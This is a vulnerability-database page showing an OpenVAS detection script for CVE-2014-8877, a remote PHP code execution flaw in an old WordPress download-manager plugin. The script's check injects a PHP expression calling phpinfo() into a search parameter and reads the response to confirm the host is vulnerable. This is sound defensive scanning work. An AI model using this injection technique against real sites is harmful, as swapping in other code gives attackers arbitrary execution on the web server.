Lucene search

K
openvasCopyright (C) 2014 Greenbone AGOPENVAS:1361412562310105120
HistoryNov 21, 2014 - 12:00 a.m.

WordPress CM Download Manager Plugin Remote PHP Code Execution Vulnerability

2014-11-2100:00:00
Copyright (C) 2014 Greenbone AG
plugins.openvas.org
16

9.4 High

AI Score

Confidence

High

0.461 Medium

EPSS

Percentile

97.4%

The CM Download Manager for WordPress is prone to remote PHP-code
execution vulnerability

# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:wordpress:wordpress";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.105120");
  script_cve_id("CVE-2014-8877");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_version("2023-07-26T05:05:09+0000");

  script_name("WordPress CM Download Manager Plugin Remote PHP Code Execution Vulnerability");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/71204");

  script_tag(name:"impact", value:"An attacker can exploit this issue to execute arbitrary PHP code
within the context of the web server. This may lead to a full compromise of the affected application
or aid in further attacks.");

  script_tag(name:"vuldetect", value:"Send a special crafted HTTP GET request and check the response");
  script_tag(name:"insight", value:"The application fails to properly validate user-supplied input");
  script_tag(name:"solution", value:"Updates are available.");

  script_tag(name:"summary", value:"The CM Download Manager for WordPress is prone to remote PHP-code
execution vulnerability");

  script_tag(name:"affected", value:"CM Download Manager 2.0.0 and prior are vulnerable.");
  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"last_modification", value:"2023-07-26 05:05:09 +0000 (Wed, 26 Jul 2023)");
  script_tag(name:"creation_date", value:"2014-11-21 10:16:00 +0100 (Fri, 21 Nov 2014)");
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2014 Greenbone AG");
  script_dependencies("gb_wordpress_http_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("wordpress/http/detected");

  exit(0);
}

include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");

if( ! port = get_app_port( cpe:CPE, service:"www" ) )
  exit( 0 );

if( ! dir = get_app_location( cpe:CPE, port:port ) )
  exit( 0 );

if( dir == "/" )
  dir = "";

url = dir + '/cmdownloads/?CMDsearch=".phpinfo()."';

if( http_vuln_check( port:port, url:url, pattern:"<title>phpinfo\(\)" ) ) {
  report = http_report_vuln_url( port:port, url:url );
  security_message( port:port, data:report );
  exit(0);
}

exit(0);

9.4 High

AI Score

Confidence

High

0.461 Medium

EPSS

Percentile

97.4%